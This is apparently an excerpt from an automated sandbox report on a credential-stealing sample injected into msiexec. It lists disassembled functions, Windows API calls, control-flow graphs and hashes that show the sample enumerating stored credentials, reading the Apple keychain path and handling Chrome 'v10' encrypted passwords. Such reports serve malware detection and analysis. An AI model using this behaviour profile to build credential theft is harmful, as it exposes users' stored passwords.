                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                    Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                      • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                      • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                    • free.MSVCRT ref: 00418803
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 1355100292-0
                                                                                                    • Opcode ID: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                    • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                    • Opcode Fuzzy Hash: d2c930e6252e89cba164dd291f6fd6a93c7c4142cb300574fab5a2c635c3ca3b
                                                                                                    • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                    Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$FirstNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 1690352074-0
                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                    Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoSystemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 3558857096-0
                                                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                    Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 43 44558e-445594 call 444b06 4->43 44 44557e-44558c call 4136c0 call 41366b 4->44 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 46 445823-445826 14->46 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 58 445879-44587c 18->58 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 77 445685 21->77 78 4456b2-4456b5 call 40b1ab 21->78 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 140 44592d-445945 call 40b6ef 24->140 141 44594a 24->141 38 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->38 39 445b29-445b32 28->39 145 4459d0-4459e8 call 40b6ef 29->145 146 4459ed 29->146 30->21 42 445609-44560d 30->42 31->30 182 445b08-445b15 call 40ae51 38->182 47 445c7c-445c85 39->47 48 445b38-445b96 memset * 3 39->48 42->21 56 44560f-445641 call 4087b3 call 40a889 call 4454bf 42->56 43->3 44->43 49 44584c-445854 call 40b1ab 46->49 50 445828 46->50 70 445d1c-445d25 47->70 71 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 47->71 63 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 48->63 64 445b98-445ba0 48->64 49->13 65 44582e-445847 call 40a9b5 call 4087b3 50->65 156 445665-445670 call 40b1ab 56->156 157 445643-445663 call 40a9b5 call 4087b3 56->157 61 4458a2-4458aa call 40b1ab 58->61 62 44587e 58->62 61->19 75 445884-44589d call 40a9b5 call 4087b3 62->75 249 445c77 63->249 64->63 76 445ba2-445bcf call 4099c6 call 445403 call 445389 64->76 143 445849 65->143 82 445fae-445fb2 70->82 83 445d2b-445d3b 70->83 160 445cf5 71->160 161 445cfc-445d03 71->161 148 44589f 75->148 76->47 93 44568b-4456a4 call 40a9b5 call 4087b3 77->93 109 4456ba-4456c4 78->109 98 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 83->98 99 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 83->99 150 4456a9-4456b0 93->150 166 445d67-445d6c 98->166 167 445d71-445d83 call 445093 98->167 196 445e17 99->196 197 445e1e-445e25 99->197 122 4457f9 109->122 123 4456ca-4456d3 call 413cfa call 413d4c 109->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 140->141 141->23 143->49 145->146 146->28 148->61 150->78 150->93 156->109 157->156 160->161 171 445d05-445d13 161->171 172 445d17 161->172 176 445fa1-445fa9 call 40b6ef 166->176 167->82 171->172 172->70 207 4456fd-445796 memset * 4 call 409c70 * 3 174->207 208 4457ea-4457f7 call 413d29 174->208 176->82 202 445b17-445b27 call 40aebe 182->202 203 445aa3-445ab0 call 40add4 182->203 196->197 198 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->198 199 445e6b-445e7e call 445093 197->199 239 445e62-445e69 198->239 240 445e5b 198->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 199->220 202->39 203->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 203->221 207->208 248 445798-4457ca call 40b2cc call 409d1f call 409b98 207->248 208->10 220->82 253 445f9b 220->253 221->182 239->199 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->208 264 4457cc-4457e5 call 4087b3 248->264 249->47 253->176 264->208 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                    • memset.MSVCRT ref: 00445986
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                    • API String ID: 1963886904-3798722523
                                                                                                    • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                    • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                                                                    Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                    • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                                                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                                                                                    • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                    • String ID: $/deleteregkey$/savelangfile
                                                                                                    • API String ID: 2744995895-28296030
                                                                                                    • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                    • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                                                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                                                                    Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040B71C
                                                                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                                                                    • memset.MSVCRT ref: 0040B756
                                                                                                    • memset.MSVCRT ref: 0040B7F5
                                                                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                    • memset.MSVCRT ref: 0040B851
                                                                                                    • memset.MSVCRT ref: 0040B8CA
                                                                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                    • memset.MSVCRT ref: 0040BB53
                                                                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                    • String ID: chp$v10
                                                                                                    • API String ID: 4290143792-2783969131
                                                                                                    • Opcode ID: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                    • Opcode Fuzzy Hash: 2d8d3858acf8204944681f745a2db0da9034132aea09d7a248e8269e324108d5
                                                                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                                                                    Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 523 40e302 517->523 524 40e489-40e495 call 40aa04 517->524 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 523->512 524->510 530 40e497-40e49f free 524->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 547 40e3e0-40e3f1 memcpy 546->547 548 40e3f4-40e3f9 546->548 547->548 550 40e3fb-40e40c memcpy 548->550 551 40e40f-40e414 548->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E407
                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E422
                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E43D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                    • Opcode ID: 899b02e83669360748f94f70086dc918a58d224d9254a700c01c8a4d26cdd5db
                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                    • Opcode Fuzzy Hash: 899b02e83669360748f94f70086dc918a58d224d9254a700c01c8a4d26cdd5db
                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 586 4093b1 574->586 587 4094ff-40950b call 443d90 574->587 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 586->589 587->568 597 40950d-409511 587->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->587 611->580 612 40929f-4092a3 611->612 612->580 614 4092a9-4092ba 612->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
